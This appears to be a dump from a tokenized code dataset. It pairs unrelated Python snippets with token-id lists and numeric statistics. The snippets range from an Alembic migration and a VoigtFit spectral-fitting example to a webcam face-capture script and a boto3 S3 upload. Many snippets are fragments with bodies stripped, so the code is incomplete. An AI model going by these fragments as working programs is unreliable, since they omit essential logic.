movie_obj.close()
return input_full, output_full
except:
print("Issues with " + str(self.lims_id) + " at " + str(output_frame_index))
| [
2,
5016,
284,
7716,
1366,
329,
3047,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
33918,
198,
11748,
289,
20,
9078,
198,
11748,
28686,
198,
11748,
11192,
273,
11125,
13,
6122,
292,
355,
41927,
292,
198,
6738,
2769,
3849,
16104,
341,
... | 2.125052 | 9,540 |
"""empty message
Revision ID: b652b688d0ed
Revises: c6170594b21e
Create Date: 2017-06-22 12:43:46.146126
"""
# revision identifiers, used by Alembic.
revision = 'b652b688d0ed'
down_revision = 'c6170594b21e'
from alembic import op
import sqlalchemy as sa
| [
37811,
28920,
3275,
198,
198,
18009,
1166,
4522,
25,
275,
43193,
65,
34427,
67,
15,
276,
198,
18009,
2696,
25,
269,
47941,
2713,
5824,
65,
2481,
68,
198,
16447,
7536,
25,
2177,
12,
3312,
12,
1828,
1105,
25,
3559,
25,
3510,
13,
20964... | 2.5 | 104 |
#!/usr/bin/env python
# Purpose: Exercise for Coursera Class Using Python to Access Web Data.
# Reads through a file, extracts numbers using regex and sums them.
import re
fh = open("regex_sum_320787.txt", 'r')
numlist = list()
for line in fh:
line = line.rstrip()
x = re.findall('[0-9]+', line)
if x:
x = [int(i) for i in x]
numlist.extend(x)
print sum(numlist)
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
32039,
25,
32900,
329,
2734,
2655,
64,
5016,
8554,
11361,
284,
8798,
5313,
6060,
13,
198,
2,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4149,
82,
832,
257,
2393,
11,
32139,
31... | 2.384615 | 169 |
import random
from Items import *
pygame.init()
| [
11748,
4738,
198,
6738,
17230,
1330,
1635,
198,
198,
9078,
6057,
13,
15003,
3419,
628,
628
] | 3.25 | 16 |
from collections import Counter
from utils import flatten_lists
| [
6738,
17268,
1330,
15034,
201,
198,
6738,
3384,
4487,
1330,
27172,
268,
62,
20713,
201
] | 4.333333 | 15 |
import astropy.io.fits as pyfits
| [
11748,
6468,
28338,
13,
952,
13,
21013,
355,
12972,
21013,
628
] | 3.090909 | 11 |
from model.command import AbsCommand
from model.game_model import AbsGameModel
from model.game_object import GameObject
| [
6738,
2746,
13,
21812,
1330,
13051,
21575,
198,
6738,
2746,
13,
6057,
62,
19849,
1330,
13051,
8777,
17633,
198,
6738,
2746,
13,
6057,
62,
15252,
1330,
3776,
10267,
628,
198
] | 4.066667 | 30 |
import numpy as np
import VoigtFit
### Fit DLA towards quasar Q1313+1441
### Observed in X-shooter P089.A-0068
z_DLA = 1.7941
logNHI = 21.3, 0.1 # value, uncertainty
# If log(NHI) is not known use:
#logNHI = None
#### Load UVB and VIS data:
UVB_fname = 'data/test_UVB_1d.spec'
res_UVB = 8000
VIS_fname = 'data/test_VIS_1d.spec'
res_VIS = 11800
wl_uvb, spec_uvb, err_uvb = np.loadtxt(UVB_fname, unpack=True)
wl_vis, spec_vis, err_vis = np.loadtxt(VIS_fname, unpack=True)
# Alternatively, load a FITS spectrum (either a FITS table or array):
# wl, flux, err, mask, header = VoigtFit.io.load_fits_spectrum(fname)
dataset = VoigtFit.DataSet(z_DLA)
dataset.add_data(wl_uvb, spec_uvb, 299792./res_UVB, err=err_uvb, normalized=False)
dataset.add_data(wl_vis, spec_vis, 299792./res_VIS, err=err_vis, normalized=False)
### Define absorption lines:
dataset.add_line('FeII_2374')
dataset.add_line('FeII_2260')
dataset.add_line('CrII_2056')
dataset.add_line('CrII_2066')
dataset.add_line('CrII_2026')
dataset.add_line('ZnII_2026')
dataset.add_line('MgI_2026')
dataset.add_line('MgI_2852')
### If a line has been defined, and you don't want to fit it
### it can either be removed from the dataset completely:
#dataset.remove_line('CrII_2056')
### or deactivated:
#dataset.deactivate_line('FeII_2374')
### A deactivated line is still present in the dataset,
### but not included in the fit. The line may still show up in the final figure.
### Define components to fit:
# dataset.reset_components()
### Add velocity components for each ion:
# ion z b logN
dataset.add_component('FeII', 1.793532, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794060, 20, 15.0, var_z=1)
dataset.add_component('FeII', 1.794282, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.794722, 20, 14.3, var_z=1)
dataset.add_component('FeII', 1.795121, 15, 14.5, var_z=1, var_b=1)
#
# Options for the components:
# var_z=1/0 vary redshift for this component
# var_b=1/0 vary b-parameter for this component
# var_N=1/0 vary column density for this component
#
# Redshift and b-parameters can be tied.
# passing the option 'tie_z=z0_FeII' ties the redshift to the first component of FeII
# passing the option 'tie_b=b2_SiII' ties the b-parameter to the third component of SiII
#
# NOTE - the ion must be defined and the component index starts with 0
#
# The entire velocity structure can be copied from one ion to another:
dataset.copy_components(from_ion='FeII', to_ion='ZnII', logN=12.9, ref_comp=1)
# This copies the five components defined for FeII to ZnII and keeps
# the same pattern of initial guesses for column density.
# By giving ref_comp and logN, this intial guess pattern is scaled such
# that the second component has logN=12.9
#
# Individual components which are not observed for weaker lines can be removed:
#dataset.delete_component('ZnII', 4) # the index '4' refers to the fifth component
#dataset.delete_component('ZnII', 3)
#dataset.delete_component('ZnII', 2)
#dataset.delete_component('ZnII', 1)
#dataset.delete_component('ZnII', 0)
# NOTE - components should be deleted from last component to first component
# not the other way around as that messes up the component numbering.
dataset.copy_components(to_ion='CrII', from_ion='FeII', logN=13.6, ref_comp=1)
dataset.copy_components(to_ion='MgI', from_ion='FeII', logN=12.4, ref_comp=1)
# Crucial step:
dataset.prepare_dataset()
# Run the fit:
popt, chi2 = dataset.fit()
# Output best-fit parameters, total column densities and make plot:
dataset.plot_fit()
if logNHI:
dataset.print_metallicity(*logNHI)
dataset.print_total()
### The best-fit parameters can be accessed from the .best_fit attribute:
#logN0 = dataset.best_fit['logN0_FeII'].value
#logN0_err = dataset.best_fit['logN0_FeII'].stderr
#b1 = dataset.best_fit['b1_FeII'].value
#b1_err = dataset.best_fit['b1_FeII'].stderr
# Or you can create a list of all values:
#logN_FeII = [dataset.best_fit['logN%i_FeII' % num].value for num in range(len(dataset.components['FeII']))]
#logN_err_FeII = [dataset.best_fit['logN%i_FeII' % num].stderr for num in range(len(dataset.components['FeII']))]
dataset.save('example_fit.hdf5')
### The dataset which was defined above can be loaded like this:
# dataset = VoigtFit.load_dataset('example_fit.hdf5')
| [
11748,
299,
32152,
355,
45941,
198,
11748,
20687,
328,
83,
31805,
198,
198,
21017,
25048,
360,
13534,
3371,
627,
42391,
1195,
1485,
1485,
10,
1415,
3901,
198,
21017,
11086,
8520,
287,
1395,
12,
1477,
25141,
350,
49352,
13,
32,
12,
405,
... | 2.583433 | 1,666 |
import os
import cv2
import face_detector
import config
if __name__ == '__main__':
camera = cv2.VideoCapture(0)
cv2.namedWindow("preview")
person_name = input('Person name: ').lower()
person_folder = os.path.join(config.original_images_path, person_name)
if not os.path.exists(person_folder):
os.mkdir(person_folder)
counter = 0
timer = 0
while counter < config.number_of_faces and camera.isOpened():
ret, frame = camera.read()
faces = face_detector.detect_faces_dlib(frame)
if len(faces):
face = faces[0]
if timer % 200 == 50:
cv2.imwrite(os.path.join(person_folder, '%s.jpg' % counter), frame)
counter += 1
face_detector.draw_text(frame, face, str(counter))
face_detector.draw_rectangle(frame, face)
cv2.imshow('Camera image', frame)
if cv2.waitKey(20) & 0xFF == 27:
break
timer += 50
camera.release()
cv2.destroyAllWindows() | [
11748,
28686,
198,
11748,
269,
85,
17,
198,
11748,
1986,
62,
15255,
9250,
198,
11748,
4566,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
4676,
796,
269,
85,
17,
13,
10798,
49630,
7,
15,
8,
... | 2.052336 | 535 |
# -*- coding: utf-8 -*-
# <nbformat>3.0</nbformat>
# <codecell>
import re
from itertools import chain, combinations
def clause_tokenize(sentence):
"""Split on comma or parenthesis, if there are more then three words for each clause"""
clause_re = re.compile(r'((?:\S+\s){2,}\S+,|(?:\S+\s){3,}(?=\((?:\S+\s){2,}\S+\)))')
clause_stem = clause_re.sub(r'\1###clausebreak###', sentence)
return [c for c in clause_stem.split('###clausebreak###') if c!='']
def word_tokenize(sentence):
"""Cut the sentence in into tokens without deleting anything"""
number_pattern = ['\d+\.\d+']
arr_pattern = ['(?: \w\.){2,3}|(?:\A|\s)(?:\w\.){2,3}|[A-Z]\. [a-z]']
escape_re = re.compile("|".join(number_pattern + arr_pattern))
escapes = escape_re.findall(sentence)
escaped_stem = escape_re.sub('protectprotectprotect', sentence)
word_stem = re.sub("([%s])" % re.escape('!"#$%&()*,./:;<=>?@[\]^_`{|}~'), r' \1 ', escaped_stem)
escaped_word_stem = word_stem.replace('{','{{').replace('}', '}}')
result = escaped_word_stem.replace('protectprotectprotect', '{}').format(*escapes)
return [r.strip() for r in result.split(' ') if r != '']
def slim_stem(token):
"""A very simple stemmer, for entity of GO stemming"""
target_subfixs = ['ic', 'tic', 'e', 'ive', 'ing', 'ical', 'nal', 'al', 'ism', 'ion', 'ation', 'ar', 'sis', 'us', 'ment']
for subfix in sorted(target_subfixs, key=len, reverse=True):
idx = token.find(subfix)
if idx != -1 and idx == len(token)-len(subfix):
return token[0:-len(subfix)]
return token
def powerset(iterable):
"powerset([1,2,3]) --> () (1,) (2,) (3,) (1,2) (1,3) (2,3) (1,2,3)"
s = list(iterable)
return chain.from_iterable(combinations(s, r) for r in range(len(s)+1))
def ngram(n, iter_tokens):
"""Return a generator of n-gram from an iterable"""
z = len(iter_tokens)
return (iter_tokens[i:i+n] for i in xrange(z-n+1))
def power_ngram(iter_tokens):
"""Generate unigram, bigram, trigram ... and the max-gram,
different from powerset(), this function will not generate skipped combinations such as (1,3)"""
return chain.from_iterable(ngram(j, iter_tokens) for j in xrange(1, len(iter_tokens)))
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
2,
1279,
46803,
18982,
29,
18,
13,
15,
3556,
46803,
18982,
29,
198,
198,
2,
1279,
8189,
3846,
29,
198,
198,
11748,
302,
198,
6738,
340,
861,
10141,
1330,
6333,
11,
1... | 2.389126 | 938 |
from poc.classes.AuxST import AuxST
from poc.classes.AuxSymbolTable import AuxSymbolTable
| [
6738,
279,
420,
13,
37724,
13,
32,
2821,
2257,
1330,
47105,
2257,
198,
6738,
279,
420,
13,
37724,
13,
32,
2821,
13940,
23650,
10962,
1330,
47105,
13940,
23650,
10962,
628,
198
] | 2.967742 | 31 |
from collections import deque
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
# BFS (Accepted), O(n) time, O(n) space
# # BFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root:
# return 0
# queue = collections.deque([(root, 1)])
# while queue:
# node, level = queue.popleft()
# if node:
# if not node.left and not node.right:
# return level
# else:
# queue.append((node.left, level+1))
# queue.append((node.right, level+1))
# # DFS (Top Voted), O(n) time, O(n) space
# def minDepth(self, root: TreeNode) -> int:
# if not root: return 0
# d = list(map(self.minDepth, (root.left, root.right)))
# return 1 + (min(d) or max(d))
| [
6738,
17268,
1330,
390,
4188,
198,
198,
2,
30396,
329,
257,
13934,
5509,
10139,
13,
198,
2,
1398,
12200,
19667,
25,
198,
2,
220,
220,
220,
220,
825,
11593,
15003,
834,
7,
944,
11,
1188,
28,
15,
11,
1364,
28,
14202,
11,
826,
28,
... | 2.011928 | 503 |
import uuid
from django.db.models import (
Model,
UUIDField,
DateTimeField,
ManyToManyField,
CASCADE,
ForeignKey,
OneToOneField,
CharField,
)
from automated_logging.decorators import exclude_model, include_model
class TestBase(Model):
""" Base for all the test models """
id = UUIDField(default=uuid.uuid4, primary_key=True)
created_at = DateTimeField(auto_now_add=True)
updated_at = DateTimeField(auto_now=True)
class OrdinaryBaseTest(TestBase):
""" Ordinary base test. Has a random char field."""
random = CharField(max_length=255, null=True)
random2 = CharField(max_length=255, null=True)
class OrdinaryTest(OrdinaryBaseTest):
""" Ordinary test. Has a random char field."""
class M2MTest(TestBase):
""" Used to test the Many-To-Many Relationship functionality of DAL"""
relationship = ManyToManyField(OrdinaryTest)
class ForeignKeyTest(TestBase):
""" Used to test ForeignKey functionality of DAL."""
relationship = ForeignKey(OrdinaryTest, on_delete=CASCADE, null=True)
class OneToOneTest(TestBase):
""" Used to test the One-To-One Relationship functionality of DAL."""
relationship = OneToOneField(OrdinaryTest, on_delete=CASCADE, null=True)
class SpeedTest(TestBase):
""" Used to test the speed of DAL """
for idx in range(100):
exec(f"column{idx} = CharField(max_length=15, null=True)")
class FullClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test the full model exclusion via meta class"""
class PartialClassBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial ignore via fields """
@exclude_model
class FullDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test full decorator exclusion """
@exclude_model(operations=['delete'], fields=['random'])
class PartialDecoratorBasedExclusionTest(OrdinaryBaseTest):
""" Used to test partial decorator exclusion """
@include_model
class DecoratorOverrideExclusionTest(OrdinaryBaseTest):
"""
Used to check if include_model
has precedence over class based configuration
"""
| [
11748,
334,
27112,
198,
6738,
42625,
14208,
13,
9945,
13,
27530,
1330,
357,
198,
220,
220,
220,
9104,
11,
198,
220,
220,
220,
471,
27586,
15878,
11,
198,
220,
220,
220,
7536,
7575,
15878,
11,
198,
220,
220,
220,
4650,
2514,
7085,
15... | 3.046043 | 695 |
version = "__VERSION__"
| [
9641,
796,
366,
834,
43717,
834,
1,
198
] | 3 | 8 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Aug 27 10:55:08 2020
@author: andreypoletaev
Assumptions made:
time is in picoseconds, timestep is 1 fs
"""
# =============================================================================
# %% Imports & constants
# =============================================================================
import sys
from hop_utils import autocorrelation
import pandas as pd
## column names for the cases that the file is a CoM file or a single-atom velocity file
com_col_names = ['timestep', 'x', 'y', 'z', 'vx', 'vy', 'vz']
vel_col_names = ['atom_id', 'time', 'vx', 'vy', 'vz']
# =============================================================================
# %% Parse inputs
# =============================================================================
## Parse inputs. Format: key=value
options = dict([ (x.split('=')[0],x.split('=')[1]) for x in sys.argv[1:] ])
# print(options)
assert 'file' in list(options.keys()) and 'duration' in list(options.keys()), \
'please pass file=... [path] and duration=... [psec] as command-line options'
col_names = vel_col_names
header = 0
if ('com' not in list(options.keys())) or (eval(options['com']) == True) :
col_names = com_col_names
header = 2
fin = pd.read_csv(options['file'], sep=' ', skiprows=header, names=col_names, index_col=False)
# print(fin.head(5))
## convert time from [steps] to [ps] if the input file has the former
try : fin['time'] = fin.timestep / 1000. ## hard-coded conversion from steps to picoseconds
except : pass
fin.set_index('time', inplace=True)
# folder = '/'.join(options['file'].split('/')[:-1])
# fn = options['file'].split('/')[-1]
dur = int(options['duration'])
fout = options['file_out']
## do the actual computation of the autocorrelation function
print(f'computing {options["file"]}')
jacf = autocorrelation(fin, dur, ['x','y','z'], verbose=True, to_file=fout).reset_index().rename(columns={'index':'time'})
# jacf.to_csv(folder+'/'+fn[3:-4]+f'_{dur}ps.csv', index=False)
print(f'computed and saved {options["file"]}') | [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
37811,
198,
41972,
319,
26223,
2447,
2681,
838,
25,
2816,
25,
2919,
12131,
198,
198,
31,
9800,
25,
290,
4364,
750... | 3.015759 | 698 |
from django.contrib import admin
from . import models
admin.site.register(models.Agency)
admin.site.register(models.Therapist)
admin.site.register(models.Client)
admin.site.register(models.ClientSymptom)
admin.site.register(models.Session)
admin.site.register(models.SymptomScore)
# from guardian.admin import GuardedModelAdmin
#
# class SymptomScoreAdmin(GuardedModelAdmin):
# pass
#
# admin.site.register(models.SymptomScore, SymptomScoreAdmin)
| [
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
198,
6738,
764,
1330,
4981,
198,
198,
28482,
13,
15654,
13,
30238,
7,
27530,
13,
32,
4949,
8,
198,
28482,
13,
15654,
13,
30238,
7,
27530,
13,
35048,
41690,
8,
198,
28482,
13,
1565... | 3.060403 | 149 |
"""LibFM implementation of fastFM """
import datatable as dt
import numpy as np
from sklearn.preprocessing import LabelEncoder
from h2oaicore.models import CustomModel
from sklearn.model_selection import StratifiedKFold
from sklearn.calibration import CalibratedClassifierCV
from sklearn.base import BaseEstimator, ClassifierMixin
from sklearn.preprocessing import StandardScaler
from scipy.sparse import csr_matrix
# paper: https://arxiv.org/abs/1505.00641
| [
37811,
25835,
23264,
7822,
286,
3049,
23264,
37227,
198,
11748,
4818,
21156,
355,
288,
83,
198,
11748,
299,
32152,
355,
45941,
198,
6738,
1341,
35720,
13,
3866,
36948,
1330,
36052,
27195,
12342,
198,
6738,
289,
17,
12162,
291,
382,
13,
... | 3.414815 | 135 |
import errno
import json
import logging
import os
import shutil
import uuid
import zipfile
import re
import subprocess
import pandas as pd
from kb_Amplicon.Utils.DataUtil import DataUtil
from installed_clients.DataFileUtilClient import DataFileUtil
from installed_clients.KBaseReportClient import KBaseReport
| [
198,
11748,
11454,
3919,
198,
11748,
33918,
198,
11748,
18931,
198,
11748,
28686,
198,
11748,
4423,
346,
198,
11748,
334,
27112,
198,
11748,
19974,
7753,
198,
11748,
302,
198,
11748,
850,
14681,
198,
198,
11748,
19798,
292,
355,
279,
67,
... | 3.402174 | 92 |
import pygame
from pygame.sprite import Sprite
import sys
class Estrela(Sprite):
"""Uma classe que representa uma unica estrela"""
def __init__(self, tela, janela):
"""Inicializa a estrela e define sua posicao inicial."""
super(Estrela, self).__init__()
self.janela = janela
self.tela = tela
# Carrega a imagem do alienigena e define seu atributo rect
self.imagem = pygame.image.load('emoji.png')
self.imagem = pygame.transform.scale(self.imagem, [15, 15])
self.rect = pygame.Rect(0, 0, 0, 0)
# Inica cada novo estrela a parte superios da tela
# Armazena a posicao exata da estrela
self.x = float(self.rect.x)
def desenha_estrela(self):
"""Desenha a estrela em sua posicao actual"""
if self.janela[0] > self.rect.x:
self.rect.x += 30
self.tela.blit(self.imagem, self.rect)
print('desenhei x')
elif self.janela[1] > self.rect.y:
self.rect.x = 0
self.rect.y += 30
inicia_jogo() | [
11748,
12972,
6057,
198,
6738,
12972,
6057,
13,
34975,
578,
1330,
33132,
198,
11748,
25064,
198,
198,
4871,
10062,
2411,
64,
7,
38454,
578,
2599,
198,
220,
220,
220,
37227,
52,
2611,
537,
21612,
8358,
2380,
64,
334,
2611,
555,
3970,
1... | 2.075581 | 516 |
#
# Helper functions for test runs in mantaflow
#
from manta import *
import os
import shutil
import re
from helperGeneric import *
# ------------------------------------------------------------------------------------------
# test result checking
# global var to print manta version once per test
printVersion = 1
# compare a grid, in generation mode (MANTA_GEN_TEST_DATA=1) it
# creates the data on disk, otherwise it loads the disk data,
# computes the largest per cell error, and checks whether it matches
# the allowed thresholds
#
# note, there are two thresholds:
# - the "normal" one is intended for comparing single precision calculations across different compilers
# - the "strict" one for double precision compiles (detected automatically)
# - the "grid" object can be either a Grid<T>, or a ParticleDataImpl<T> ; parent is either FluidSolver or ParticleSystem
#
# ------------------------------------------------------------------------------------------
# smaller helpers (directories, global settings)
# for xl test, load test data afterwards to keep sims in sync
# reset and generate info file with version string when in data gen mode
# read test data
# try to load uni file if it exists
# configure input filenames
# try to load uni file if it exists
| [
2,
198,
2,
5053,
525,
5499,
329,
1332,
4539,
287,
24818,
1878,
9319,
198,
2,
220,
198,
198,
6738,
285,
4910,
1330,
1635,
198,
11748,
28686,
198,
11748,
4423,
346,
198,
11748,
302,
198,
6738,
31904,
46189,
1330,
1635,
628,
198,
2,
16... | 4.137821 | 312 |
from gym.envs.registration import register
register(
id='recon-arena-v0',
entry_point='gym_marl_reconnaissance.envs.recon_arena:ReconArena',
)
| [
6738,
11550,
13,
268,
14259,
13,
2301,
33397,
1330,
7881,
198,
198,
30238,
7,
198,
220,
220,
220,
4686,
11639,
260,
1102,
12,
533,
2616,
12,
85,
15,
3256,
198,
220,
220,
220,
5726,
62,
4122,
11639,
1360,
76,
62,
3876,
75,
62,
260,... | 2.375 | 64 |
"""
Aliyun ECS
==========
The following DNS API actions are nearly fully supported:
* AddDomainRecord
* DeleteDomainRecord
* DescribeDomainRecords
"""
| [
37811,
198,
2348,
7745,
403,
412,
7902,
198,
2559,
855,
198,
198,
464,
1708,
18538,
7824,
4028,
389,
3016,
3938,
4855,
25,
628,
220,
220,
220,
1635,
3060,
43961,
23739,
198,
220,
220,
220,
1635,
23520,
43961,
23739,
198,
220,
220,
220... | 3.235294 | 51 |
import sys
import logging
from sentry_sdk import utils
from sentry_sdk.hub import Hub
from sentry_sdk.utils import logger
from sentry_sdk.client import _client_init_debug
from logging import LogRecord
| [
11748,
25064,
198,
11748,
18931,
198,
198,
6738,
1908,
563,
62,
21282,
74,
1330,
3384,
4487,
198,
6738,
1908,
563,
62,
21282,
74,
13,
40140,
1330,
14699,
198,
6738,
1908,
563,
62,
21282,
74,
13,
26791,
1330,
49706,
198,
6738,
1908,
56... | 3.269841 | 63 |
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2018, Anaconda, Inc. and Intake contributors
# All rights reserved.
#
# The full license is in the LICENSE file, distributed with this software.
#-----------------------------------------------------------------------------
''' Provide a ``main`` function to run intake commands.
'''
import logging
log = logging.getLogger(__name__)
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# Standard library imports
import argparse
# External imports
# Intake imports
from intake import __version__
from intake.cli.util import die, nice_join
#-----------------------------------------------------------------------------
# API
#-----------------------------------------------------------------------------
def main(description, subcommands, argv):
''' Execute an intake command.
Args:
description (str) :
A description for this top-level command
subcommands (seq[SubCommand]) :
A list of subcommands to configure for argparse
argv (seq[str]) :
A list of command line arguments to process
Returns:
None
'''
if len(argv) == 1:
die("ERROR: Must specify subcommand, one of: %s" % nice_join(x.name for x in subcommands))
parser = argparse.ArgumentParser(
prog=argv[0],
description=description,
epilog="See '<command> --help' to read about a specific subcommand.")
parser.add_argument('-v', '--version', action='version', version=__version__)
subs = parser.add_subparsers(help="Sub-commands")
for cls in subcommands:
subparser = subs.add_parser(cls.name, help=cls.__doc__.strip())
subcommand = cls(parser=subparser)
subparser.set_defaults(invoke=subcommand.invoke)
args = parser.parse_args(argv[1:])
try:
return args.invoke(args) or 0 # convert None to 0
except Exception as e:
die("ERROR: " + repr(e))
| [
2,
10097,
32501,
198,
2,
15069,
357,
66,
8,
2321,
532,
2864,
11,
1052,
330,
13533,
11,
3457,
13,
290,
48885,
20420,
198,
2,
1439,
2489,
10395,
13,
198,
2,
198,
2,
383,
1336,
5964,
318,
287,
262,
38559,
24290,
2393,
11,
9387,
351,
... | 3.287267 | 644 |
# Given two strings s and t , write a function to determine if t is an anagram of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your solution to such case?
#
#
# @lc app=leetcode id=242 lang=python3
#
# [242] Valid Anagram
#
# https://leetcode.com/problems/valid-anagram/description/
#
# algorithms
# Easy (52.65%)
# Likes: 751
# Dislikes: 112
# Total Accepted: 357K
# Total Submissions: 678K
# Testcase Example: '"anagram"\n"nagaram"'
#
# Given two strings s and t , write a function to determine if t is an anagram
# of s.
#
# Example 1:
#
#
# Input: s = "anagram", t = "nagaram"
# Output: true
#
#
# Example 2:
#
#
# Input: s = "rat", t = "car"
# Output: false
#
#
# Note:
# You may assume the string contains only lowercase alphabets.
#
# Follow up:
# What if the inputs contain unicode characters? How would you adapt your
# solution to such case?
#
#
| [
2,
11259,
734,
13042,
264,
290,
256,
1849,
11,
3551,
257,
2163,
284,
5004,
611,
256,
318,
281,
281,
6713,
286,
264,
13,
201,
198,
2,
198,
2,
17934,
352,
25,
201,
198,
2,
198,
2,
198,
2,
23412,
25,
264,
796,
366,
272,
6713,
160... | 2.668235 | 425 |
"""
*`prin` Prints the results of all the following function, and the numeric value
of any namespace.
*`let` converts an integer into its Unicode character.
*`if` returns the highest number of two different namespaces/function
*`set` override the numeric value of a namespace, and replaces the original in duplicate cases.
*`run` Run the function at the given numeric property, if no function is there, crashes.
*`add` add two numeric properties
*`sub` subtracts two numeric properties
*`split` run two functions
"""
| [
37811,
198,
198,
9,
63,
1050,
259,
63,
12578,
82,
262,
2482,
286,
477,
262,
1708,
2163,
11,
290,
262,
35575,
1988,
198,
1659,
597,
25745,
13,
198,
9,
63,
1616,
63,
26161,
281,
18253,
656,
663,
34371,
2095,
13,
198,
9,
63,
361,
6... | 4.015504 | 129 |
#!/usr/bin/env python3
"""detectors.py: contains face detectors modules."""
__author__ = "Ahmed Hermas"
__copyright__ = "Copyright 2022, © UOL "
__license__ = "MIT"
__version__ = "0.0.1"
__email__ = "a7medhermas@gmail.com"
import os
import torch
from cv2 import cv2
import utils
import numpy as np
from Siamese_resnet18 import myResNet
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
18,
198,
198,
37811,
15255,
478,
669,
13,
9078,
25,
4909,
1986,
40471,
13103,
526,
15931,
198,
198,
834,
9800,
834,
796,
366,
10910,
1150,
2332,
5356,
1,
198,
834,
22163,
4766,
834,
796,
... | 2.712 | 125 |
#!/usr/bin/env python
# Copyright (c) 2017, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
"""
Description: An example of how to add CIQ Identity information to a STIX
Indicator.
"""
# stdlib
from pprint import pprint
# python-cybox
from cybox.objects.file_object import File
# python-stix
import stix.utils as utils
from stix.core import STIXPackage, STIXHeader
from stix.indicator import Indicator
import stix.extensions.identity.ciq_identity_3_0 as stix_ciq
if __name__ == '__main__':
main()
| [
2,
48443,
14629,
14,
8800,
14,
24330,
21015,
198,
2,
15069,
357,
66,
8,
2177,
11,
383,
17168,
2200,
10501,
13,
1439,
2489,
10395,
13,
198,
2,
4091,
38559,
24290,
13,
14116,
329,
1844,
2846,
13,
198,
198,
37811,
198,
11828,
25,
1052,... | 3.045198 | 177 |
import pygame
| [
11748,
12972,
6057,
198,
220,
220,
220,
220,
220,
220,
220,
220,
628
] | 1.846154 | 13 |
import boto3
import configparser
import logging
from datetime import datetime
from botocore.exceptions import NoCredentialsError
import os
import sys
from pathlib import Path
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from src.constants import FILE_NAME
"""
Setting up s3 destination structure.
"""
day = datetime.now()
S3_FILE_KEY = str(day.year) + '/' + str(day.month) + '/' \
+ str(day.day) + '/' + str(day.hour) + '.csv'
"""
Setting up logging.
"""
sc_log = logging.getLogger(__name__)
sc_log.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s:%(name)s:%(message)s')
DIRECTORY = 'logs/transfer/' + str(day.year) + '/' + str(day.month) + '/' + str(day.day) + '/'
Path(DIRECTORY).mkdir(parents=True, exist_ok=True)
handler = logging.FileHandler(DIRECTORY + str(day.hour) + '.log')
sc_log.addHandler(handler)
"""
Loading in the KEYS
"""
config = configparser.ConfigParser()
config.read('config.ini')
ACCESS_KEY = config['AWS']['ACCESS_KEY']
SECRET_KEY = config['AWS']['SECRET_KEY']
"""
File related constants
"""
s3 = boto3.client('s3', aws_access_key_id=ACCESS_KEY, aws_secret_access_key=SECRET_KEY)
try:
s3.upload_file(FILE_NAME, 'weather-scrape-bucket', S3_FILE_KEY)
sc_log.log(logging.DEBUG, "Completed S3 upload.")
except FileNotFoundError:
sc_log.exception("The file was not found.")
except NoCredentialsError:
sc_log.exception("There is an issue with the credentials.")
| [
11748,
275,
2069,
18,
198,
11748,
4566,
48610,
198,
11748,
18931,
198,
6738,
4818,
8079,
1330,
4818,
8079,
198,
6738,
10214,
420,
382,
13,
1069,
11755,
1330,
1400,
34,
445,
14817,
12331,
198,
11748,
28686,
198,
11748,
25064,
198,
6738,
... | 2.616071 | 560 |
from typing import Any
from pandas_profiling.report.presentation.core.item_renderer import ItemRenderer
| [
6738,
19720,
1330,
4377,
198,
198,
6738,
19798,
292,
62,
5577,
4386,
13,
13116,
13,
25579,
341,
13,
7295,
13,
9186,
62,
10920,
11882,
1330,
9097,
49,
437,
11882,
628
] | 3.533333 | 30 |
import graphviz as gv
import os
from pyflowgraph.models import ExtControlFlowGraph, DataNode, OperationNode, ControlNode, ControlEdge, DataEdge, EntryNode
| [
11748,
4823,
85,
528,
355,
308,
85,
198,
11748,
28686,
198,
198,
6738,
12972,
11125,
34960,
13,
27530,
1330,
5683,
15988,
37535,
37065,
11,
6060,
19667,
11,
14680,
19667,
11,
6779,
19667,
11,
6779,
37021,
11,
6060,
37021,
11,
21617,
196... | 3.697674 | 43 |
# not good
# Dynamic programing
| [
198,
198,
2,
407,
922,
628,
198,
198,
2,
26977,
1430,
278,
198
] | 2.846154 | 13 |
from datetime import datetime
from ethtx_ce.config import EthConfig
from ethtx_ce.backend.models.objects_model import Block, Event, Transaction
from mocks.mocks import MockWeb3Provider
| [
6738,
4818,
8079,
1330,
4818,
8079,
198,
198,
6738,
4555,
17602,
62,
344,
13,
11250,
1330,
9956,
16934,
198,
6738,
4555,
17602,
62,
344,
13,
1891,
437,
13,
27530,
13,
48205,
62,
19849,
1330,
9726,
11,
8558,
11,
45389,
198,
6738,
285,
... | 3.596154 | 52 |
"""Run a model simulation."""
# Default climate data is ERA-Interim; specify CMIP5 by specifying a filename to the argument:
# (Command line) python run_simulation_list_multiprocess.py -gcm_list_fn=C:\...\gcm_rcpXX_filenames.txt
# - Default is running ERA-Interim in parallel with five processors.
